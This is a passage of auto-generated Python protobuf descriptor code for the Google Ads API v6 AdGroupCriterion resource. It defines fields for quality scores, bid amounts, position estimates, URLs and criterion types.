dependencies=[google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_common_dot_custom__parameter__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__approval__status__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__status__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__system__serving__status__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_ADGROUPCRITERION_QUALITYINFO = _descriptor.Descriptor(
name='QualityInfo',
full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.quality_score', index=0,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='creative_quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.creative_quality_score', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='post_click_quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.post_click_quality_score', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='search_predicted_ctr', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.search_predicted_ctr', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='_quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo._quality_score',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=4072,
serialized_end=4469,
)
_ADGROUPCRITERION_POSITIONESTIMATES = _descriptor.Descriptor(
name='PositionEstimates',
full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='first_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.first_page_cpc_micros', index=0,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='first_position_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.first_position_cpc_micros', index=1,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='top_of_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.top_of_page_cpc_micros', index=2,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='estimated_add_clicks_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.estimated_add_clicks_at_first_position_cpc', index=3,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='estimated_add_cost_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.estimated_add_cost_at_first_position_cpc', index=4,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='_first_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._first_page_cpc_micros',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_first_position_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._first_position_cpc_micros',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_top_of_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._top_of_page_cpc_micros',
index=2, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_estimated_add_clicks_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._estimated_add_clicks_at_first_position_cpc',
index=3, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_estimated_add_cost_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._estimated_add_cost_at_first_position_cpc',
index=4, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=4472,
serialized_end=4916,
)
_ADGROUPCRITERION = _descriptor.Descriptor(
name='AdGroupCriterion',
full_name='google.ads.googleads.v6.resources.AdGroupCriterion',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005\372A+\n)googleads.googleapis.com/AdGroupCriterion', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='criterion_id', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.criterion_id', index=1,
number=56, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.status', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quality_info', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.quality_info', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ad_group', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.ad_group', index=4,
number=57, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005\372A\"\n googleads.googleapis.com/AdGroup', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.type', index=5,
number=25, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='negative', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.negative', index=6,
number=58, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='system_serving_status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.system_serving_status', index=7,
number=52, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='approval_status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.approval_status', index=8,
number=53, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='disapproval_reasons', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.disapproval_reasons', index=9,
number=59, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bid_modifier', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.bid_modifier', index=10,
number=61, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.cpc_bid_micros', index=11,
number=62, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.cpm_bid_micros', index=12,
number=63, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.cpv_bid_micros', index=13,
number=64, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.percent_cpc_bid_micros', index=14,
number=65, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpc_bid_micros', index=15,
number=66, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpm_bid_micros', index=16,
number=67, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpv_bid_micros', index=17,
number=68, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_percent_cpc_bid_micros', index=18,
number=69, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpc_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpc_bid_source', index=19,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpm_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpm_bid_source', index=20,
number=22, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpv_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpv_bid_source', index=21,
number=23, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_percent_cpc_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_percent_cpc_bid_source', index=22,
number=35, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='position_estimates', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.position_estimates', index=23,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='final_urls', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.final_urls', index=24,
number=70, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='final_mobile_urls', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.final_mobile_urls', index=25,
number=71, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='final_url_suffix', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.final_url_suffix', index=26,
number=72, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tracking_url_template', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.tracking_url_template', index=27,
number=73, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='url_custom_parameters', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.url_custom_parameters', index=28,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='keyword', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.keyword', index=29,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='placement', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.placement', index=30,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_app_category', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.mobile_app_category', index=31,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_application', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.mobile_application', index=32,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='listing_group', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.listing_group', index=33,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='age_range', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.age_range', index=34,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gender', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.gender', index=35,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='income_range', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.income_range', index=36,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parental_status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.parental_status', index=37,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_list', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.user_list', index=38,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_video', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.youtube_video', index=39,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_channel', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.youtube_channel', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='topic', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.topic', index=41,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_interest', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.user_interest', index=42,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webpage', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.webpage', index=43,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='app_payment_model', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.app_payment_model', index=44,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='custom_affinity', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.custom_affinity', index=45,
number=48, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='custom_intent', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.custom_intent', index=46,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='custom_audience', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.custom_audience', index=47,
number=74, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='combined_audience', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.combined_audience', index=48,
number=75, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ADGROUPCRITERION_QUALITYINFO, _ADGROUPCRITERION_POSITIONESTIMATES, ],
enum_types=[
],
serialized_options=b'\352Aq\n)googleads.googleapis.com/AdGroupCriterion\022Dcustomers/{customer_id}/adGroupCriteria/{ad_group_id}~{criterion_id}',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='criterion', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.criterion',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_criterion_id', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._criterion_id',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_ad_group', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._ad_group',
index=2, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_negative', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._negative',
index=3, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_bid_modifier', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._bid_modifier',
index=4, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._cpc_bid_micros',
index=5, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._cpm_bid_micros',
index=6, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._cpv_bid_micros',
index=7, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._percent_cpc_bid_micros',
index=8, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_cpc_bid_micros',
index=9, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_cpm_bid_micros',
index=10, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_cpv_bid_micros',
index=11, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_percent_cpc_bid_micros',
index=12, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_final_url_suffix', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._final_url_suffix',
index=13, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_tracking_url_template', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._tracking_url_template',
index=14, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=656,
serialized_end=5362,
)
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['creative_quality_score'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2._QUALITYSCOREBUCKETENUM_QUALITYSCOREBUCKET
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['post_click_quality_score'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2._QUALITYSCOREBUCKETENUM_QUALITYSCOREBUCKET
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['search_predicted_ctr'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2._QUALITYSCOREBUCKETENUM_QUALITYSCOREBUCKET
_ADGROUPCRITERION_QUALITYINFO.containing_type = _ADGROUPCRITERION
_ADGROUPCRITERION_QUALITYINFO.oneofs_by_name['_quality_score'].fields.append(
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['quality_score'])
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['quality_score'].containing_oneof = _ADGROUPCRITERION_QUALITYINFO.oneofs_by_name['_quality_score']
